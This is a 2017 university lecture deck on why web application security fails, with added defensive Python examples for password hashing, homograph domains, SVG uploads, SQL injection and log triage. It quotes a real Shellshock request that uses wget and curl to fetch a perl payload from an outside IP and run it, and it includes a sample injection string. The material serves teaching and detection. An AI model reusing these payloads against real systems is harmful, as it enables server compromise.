HOW AND WHY WEB APP SECURITY FAILS?
16.2. 2017 Tampere University of Technology
Antti.virtanen@solita.fi
Twitter: @Anakondantti
FOREWORD, 1 MINUTE
› Solita?
› Me?
› Web application?
• Much more important than you may realize..
AGENDA
› How to make secure software?
› … But, everything is broken!
› … Because ...
• Same mistakes are repeated.
• Unthinkable, Unpossible, Impossiblator happens
› Practical web application security testing.
› Bonus: 10. fail 20. goto 10
SECURITY IS RISK MANAGEMENT
“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”
Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie
Source: NSA recruitment video.
Source: securityintelligence.com
Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS: SECURITY IS SIMPLE!
Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE
1. Design it properly. Do the right thing.
2. Do it right.
   1. Mistake in implementation = bug = security issue.
3. Prepare for the unthinkable.
(Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING
1. Don’t roll your own.
   1. Especially, don’t invent hash algorithms, random number generators or crypto!
   2. Seriously. Failure imminent and certain.
2. Follow best practices.
3. Understand what you are doing.
   1. Read the RFC. Understand your tools and libs.
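Added example, not code from the slides: the “don’t roll your own” rule applied to password storage, using only the Python standard library. `legacy_md5` is the unsalted single-digest pattern the deck later files under legacy burden (identical passwords give identical digests, so one precomputed table cracks every user); `hash_password` and `verify_password` use PBKDF2-HMAC-SHA256 with a per-user salt from the OS CSPRNG and a constant-time comparison. The `algo$iterations$salt$digest` record format and the iteration count are this example’s own choices, not something the slides specify.

```python
import hashlib
import hmac
import os

# Legacy pattern: unsalted MD5. Same password -> same digest for every user,
# so a single precomputed table (or a leaked digest from another site) cracks all of them.
def legacy_md5(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Standard-library KDF instead of an invented one. Record format is this example's
# own choice: algorithm$iterations$salt_hex$digest_hex, so parameters can be raised later.
ALGO = "pbkdf2_sha256"
DEFAULT_ITERATIONS = 600_000  # tune so one verification costs ~100 ms on the server


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS) -> str:
    """Hash a new password with a fresh random salt and return the storable record."""
    salt = os.urandom(16)  # OS CSPRNG, not a home-made random number generator
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGO}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the parameters stored in the record and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False  # malformed record: never a match
    if algo != ALGO:
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # compare_digest avoids leaking how many leading bytes matched via timing
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
    print(verify_password("wrong", record))
```

Two users with the same password get different records because the salt differs, which is exactly what the legacy digest lacks.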
SOMETHING UNTHINKABLE
It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
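Added example, not part of the deck: how a defender can surface the puny-code trick this slide refers to. A homograph such as `аpple.com` with a Cyrillic `а` travels in DNS as `xn--pple-43d.com`; this Python code uses only the standard-library IDNA codec and `unicodedata` to convert either form to what the user sees and to flag labels whose letters come from more than one script. The sample hostnames are constructed for the example, and the script-name heuristic is this example’s own, not the author’s.

```python
import unicodedata


def to_ascii(hostname: str) -> str:
    """Unicode hostname -> the ACE form that actually travels in DNS ("xn--" labels)."""
    return hostname.encode("idna").decode("ascii")


def to_unicode(hostname: str) -> str:
    """Either form -> the Unicode form the user sees in an address bar or mail client."""
    return hostname.encode("idna").decode("idna")


def letter_scripts(label: str) -> set:
    """Scripts used by the letters of one label, read off the Unicode character names
    ('CYRILLIC SMALL LETTER A' -> 'CYRILLIC'). Digits and hyphens are ignored."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def mixed_script_labels(hostname: str) -> list:
    """Labels whose letters come from more than one script: the classic homograph signal.
    Genuine single-script IDNs (a Finnish domain with 'ä', say) are left alone."""
    return [
        label
        for label in to_unicode(hostname).split(".")
        if len(letter_scripts(label)) > 1
    ]


def is_suspicious(hostname: str) -> bool:
    """True when any label of the hostname mixes scripts, whichever form it was given in."""
    return bool(mixed_script_labels(hostname))


if __name__ == "__main__":
    # Constructed samples: Cyrillic 'а' (U+0430) in an otherwise Latin label, and a real
    # single-script IDN shape for contrast.
    for host in ("\u0430pple.com", "xn--pple-43d.com", "p\u00e4iv\u00e4.fi", "apple.com"):
        print(host, "->", to_ascii(host), "->", to_unicode(host), "suspicious:", is_suspicious(host))
```

Run the check on the decoded form on both sides of a trust boundary (inbound mail links, outbound proxy logs): the ACE form is what the resolver sees, the Unicode form is what the human sees, and the attack lives in the gap between them.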
A PICTURE IS WORTH 1000 WORDS
› Demo-time: SVG is a picture file, right?
› Feeling lucky, punk?
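Added example, not code from the slides: the check an upload handler should run before treating an SVG as “just a picture”. SVG is XML and may carry `<script>`, event-handler attributes (`onload`, `onclick`, …), `javascript:` links, `<foreignObject>` with arbitrary HTML, and a DTD with entities (the XXE route the deck mentions). The Python below rejects any of those using the standard-library parser; the sample documents are constructed for the example, and the element and attribute lists are this example’s own choice of what a picture never needs.

```python
import xml.etree.ElementTree as ET

# Elements a static picture never needs: script runs code, foreignObject embeds
# arbitrary HTML (and with it scripts, forms and iframes).
ACTIVE_ELEMENTS = {"script", "foreignobject"}


def svg_active_content(data: bytes) -> list:
    """List every piece of active content in an SVG document.

    Raises xml.etree.ElementTree.ParseError when the data is not well-formed XML.
    """
    findings = []
    root = ET.fromstring(data)
    for element in root.iter():
        tag = element.tag.rsplit("}", 1)[-1].lower()          # drop "{namespace}" prefix
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attribute, value in element.attrib.items():
            name = attribute.rsplit("}", 1)[-1].lower()        # xlink:href -> href
            if name.startswith("on"):                           # onload, onclick, onmouseover...
                findings.append(f"<{tag} {name}> event handler")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"<{tag} {name}> javascript: URL")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Accept an upload as a picture only if it parses and carries no active content."""
    # A picture needs no DTD: refuse entity declarations before any parser sees them
    # (internal entity expansion and external entities are the XXE route).
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return False
    try:
        return not svg_active_content(data)
    except ET.ParseError:
        return False


# Constructed sample documents for the example.
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'
ACTIVE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"'
    b' onload="console.log(1)">'
    b'<script>console.log(2)</script>'
    b'<a xlink:href="javascript:console.log(3)"><text>picture?</text></a>'
    b'</svg>'
)
DTD_SVG = (
    b'<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY x "y">]>'
    b'<svg xmlns="http://www.w3.org/2000/svg"/>'
)

if __name__ == "__main__":
    print("clean :", is_safe_svg(CLEAN_SVG), svg_active_content(CLEAN_SVG))
    print("active:", is_safe_svg(ACTIVE_SVG), svg_active_content(ACTIVE_SVG))
    print("dtd   :", is_safe_svg(DTD_SVG))
```

This is a reject-on-detection gate, not a sanitiser: when the application only needs a picture, rasterising the SVG server-side or serving it from a separate origin with `Content-Disposition: attachment` removes the script problem entirely, and this check is the cheap first line in front of that.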
WHAT THE ACTUAL **** ??
INPUT SANITATION = 80% WIN
THE SAME STORY ALL OVER!
› XSS, CSRF, SQL injection, XXE..
• Are all about input validation.
› Solution: white-list what is allowed, deny everything else.
› There’s still 20% left
• You can certainly fail session management, but..
• Follow the advice: Don’t invent your own and you’ll be pretty safe.
JAVASCRIPT: NECESSARY (?) EVIL
JAVASCRIPT IS FULL OF EVIL
(GREPPING “EVIL” FROM JS SOURCES)
“The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute.”
Arnold “Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE AGAINST GRUYERE
http://google-gruyere.appspot.com/
LET’S XSS !
› Reflected vs. Stored
› <script> doesn’t work?
• No problem, JS is everywhere..
› Can’t XMLHttpRequest?
• No prob, counter and fake
SQL INJECTION
› GRUYERE does not contain SQL injection..
› But .. It’s a good example of an injection
› SQL = Structured Query Language
• However, “query” is a bit of a misnomer..
What is this???
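Added example covering both the “input sanitation = 80% win” slide and this one; it is not code from the slides or from Gruyere. In Python with the standard-library `sqlite3` it shows the three pieces side by side: an allow-list validator that rejects anything outside the expected shape instead of trying to clean it, output encoding for the HTML context (the part of XSS that validation alone does not cover), and the same user lookup written once with string concatenation and once with a bound parameter. The table, rows and username rule are constructed for the example.

```python
import html
import re
import sqlite3

# Allow-list: state exactly what a username may look like; everything else is rejected.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")


def is_valid_username(value: str) -> bool:
    """fullmatch, not search: the whole value must fit the allow-list."""
    return USERNAME_RE.fullmatch(value) is not None


def validate_username(value: str) -> str:
    """Return the value unchanged if it is allowed; never try to 'clean' a bad one."""
    if not is_valid_username(value):
        raise ValueError("username: 3-32 chars of a-z, 0-9, _ starting with a letter")
    return value


def render_greeting(display_name: str) -> str:
    """Output encoding for an HTML text context. A free-text display name legitimately
    contains <, & or quotes, so validation cannot do this job; escaping at output can."""
    return f"<p>Hello, {html.escape(display_name, quote=True)}!</p>"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the input becomes statement text, so it can rewrite the WHERE clause."""
    sql = f"SELECT name FROM users WHERE name = '{name}' ORDER BY name"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the input is a bound parameter; it is compared, never parsed as SQL."""
    return conn.execute(
        "SELECT name FROM users WHERE name = ? ORDER BY name", (name,)
    ).fetchall()


def set_email_safe(conn: sqlite3.Connection, name: str, email: str) -> int:
    """'Query' is a misnomer: SQL also writes, so writes get the same bound parameters."""
    cur = conn.execute("UPDATE users SET email = ? WHERE name = ?", (email, name))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    conn = make_db()
    tampered = "' OR '1'='1"
    print("unsafe:", find_user_unsafe(conn, tampered))   # every row comes back
    print("safe  :", find_user_safe(conn, tampered))     # no user has that literal name
    print("valid :", is_valid_username(tampered))        # rejected before it reaches SQL
    print(render_greeting('<b>"Bob" & co</b>'))
```

Validation at the edge and bound parameters at the database are independent layers: the first keeps junk out of most fields, the second makes the injection impossible even for fields that must accept quotes and spaces.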
INPUT SANITATION, STILL FAILING
LOGIC ATTACKS ARE DIFFICULT
› Real example..
REAL WORLD ATTACK FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED)
› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
Google tip: Shellshock
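Added example, not part of the deck: detection logic for the log line above, in Python. The sample is the line printed on the slide (the author had already redacted the customer IPs with x’s), reassembled onto one line, plus a constructed benign line in the same layout for contrast. `parse_fields` splits this logger’s `key: value ,key: value` layout, `SHELLSHOCK_RE` matches the `() { :;};` function-definition prefix that Shellshock-vulnerable Bash executed when a CGI exported the header as an environment variable, and `triage` pulls out the download URLs so they can be blocked and hunted for across other hosts. The field list and regexes are this example’s own.

```python
import re

# Log line as printed on the slide (customer IPs already redacted by the author),
# reassembled onto one line as the sample input for this example.
SAMPLE_LOG = (
    "2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. "
    "host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi "
    ",query-string: ,user-agent: () { :;}; /bin/bash -c \"cd /var/tmp;wget "
    "http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;"
    "perl /var/tmp/efixx;perl efixx\" ,referer: ,oid: "
)

# Constructed benign request in the same layout, for contrast.
BENIGN_LOG = (
    "2015-02-09:2015-02-09 09:18:44,001 INFO xxxx.infra.print-wrapper: Request 387281 start. "
    "host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /index.html "
    ",query-string: ,user-agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/35.0 "
    ",referer: ,oid: "
)

# The fields this logger prints as "key: value ,key: value". Values may be empty and
# may contain spaces, semicolons and quotes, so a value ends at the next known key,
# not at whitespace.
KEYS = "host|remote-addr|method|uri|query-string|user-agent|referer|oid"
FIELD_RE = re.compile(rf"\b({KEYS}):\s*(.*?)\s*(?=,(?:{KEYS}):|$)")

# Shellshock trigger: a Bash function definition "() { ... };" placed in a header that
# a CGI script ends up exporting as an environment variable; whatever follows it ran.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Download locations in the payload: indicators to block and to search for elsewhere.
URL_RE = re.compile(r"https?://[^\s;\"']+")


def parse_fields(line: str) -> dict:
    """Return the logger's key/value fields as a dict; keys the line lacks are absent."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def triage(line: str) -> dict:
    """Summarise one request: Shellshock attempt or not, from where, against what,
    and which URLs the payload tried to fetch."""
    fields = parse_fields(line)
    user_agent = fields.get("user-agent", "")
    return {
        "shellshock": SHELLSHOCK_RE.search(user_agent) is not None,
        "remote_addr": fields.get("remote-addr", ""),
        "uri": fields.get("uri", ""),
        "urls": sorted(set(URL_RE.findall(user_agent))),
    }


if __name__ == "__main__":
    for line in (SAMPLE_LOG, BENIGN_LOG):
        print(triage(line))
```

Running the same function over the whole access log answers the slide’s next question (what did the attacker want) from the defender’s side: which hosts saw the pattern, whether any of them actually had a CGI at that URI, and whether anything on the network ever contacted the listed download host.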
WHAT THE ATTACKER WANTED?
efixx – first lines..
core – first lines..
DEV OR OPS? OR #DEVSEC ?
› Who is responsible for that server?
› Do you need to care as a developer?
› Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-2017
Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY
MD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”
› Native code is dangerous..
• ASLR & DEP make buffer overflows more difficult to exploit, but it still happens.
› The lifespan of software can be surprisingly long..
• How to update and re-evaluate working software if nothing happens?
• Home-exercise: Sell this to team & customer. Involves risk and cost.
› New threats have emerged.
• What parts are affected?
Screenshot removed..
FAIL 2: SHORTCUTS AND ANARCHY
› Root cause: Heavy process, not understood / accepted by devs
• making developers miserable..
› The devs are innovative people..
http//unauthorized..
V 1.3 coolserver
AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT
› http://webhack.fi was a light-weight fun bug bounty hunt..
• The targets were not publicly accessible, but they were production systems we created for our customers.
› Hackers hacked..
› .. SQL injection -> dumped the whole database
› .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT
INTO..
› One issue turned out to be a 0-day in Spring libraries..
› Hnggh..
› The moral of the story is two-fold:
1. even if you do everything right, you can still fail
2. it’s not always so easy in real life..
› The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL
• From the internet:
• OWASP Top 10
• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• OWASP ZAP proxy
• https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
• Kali Linux
• https://www.kali.org/
Webapp security-tut-2017
